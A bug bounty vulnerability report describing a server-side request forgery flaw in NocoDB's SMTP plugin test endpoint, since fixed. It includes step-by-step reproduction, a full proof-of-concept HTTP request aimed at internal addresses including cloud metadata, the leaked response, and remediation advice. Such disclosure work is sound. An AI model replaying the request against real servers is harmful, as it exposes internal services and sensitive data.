SSRF via Plugin SMTP in nocodb/nocodb

Valid

Reported on

Jun 9th 2022


Description

The SMTP plugin doesn't have verification or validation, allowing the attacker to make requests to internal servers and get the contents.

Reproduce

  1. Go to Team & Settings
  2. App Store > SMTP
  3. Configure and intercept Test request
  4. Change Host/Port to internal address, example: 169.254.169.254, 192.168.0.1, 127.0.0.1
  5. You receive the contents of the connection.

Proof of Concept

POST /api/v1/db/meta/plugins/test HTTP/1.1
Host: 192.168.15.50:8080
Content-Length: 129
Accept: application/json, text/plain, */*
xc-gui: true
xc-auth: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Content-Type: application/json
Origin: http://192.168.15.50:8080
Referer: http://192.168.15.50:8080/dashboard/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: refresh_token=
Connection: close

{"input":{"from":"","host":"192.168.15.41","port":"1337","secure":""},"id":"nc_rb4gaggzddwut5","category":"Email","title":"SMTP"}

Response

{"msg":"Invalid greeting. response=[INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE: [INTERAL] - SUPERADMIN MANAGMENT SYSTEM PRIVATE"}

Video Demo

https://drive.google.com/file/d/1hCJ8nXpssBRq7sV8JN73oXupN_zPWN-T/view?usp=sharing

Remediation

  • Implement a validation and filtering of data received by the user.
  • Use a allow-list with the necessary IPs for the application.
  • User does not receive the connection content.

Impact

SSRF to internal addresses, attacker can make a request as the server and read it's contents, this can lead to leak of sensitive information.

We are processing your report and will contact the nocodb team within 24 hours. 17 days ago
We have contacted a member of the nocodb team and are waiting to hear back 16 days ago
We have sent a follow up to the nocodb team. We will try again in 7 days. 13 days ago
navi validated this vulnerability 13 days ago
Jonatas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
navi confirmed that a fix has been merged on a18f5d 13 days ago
navi has been awarded the fix bounty
to join this conversation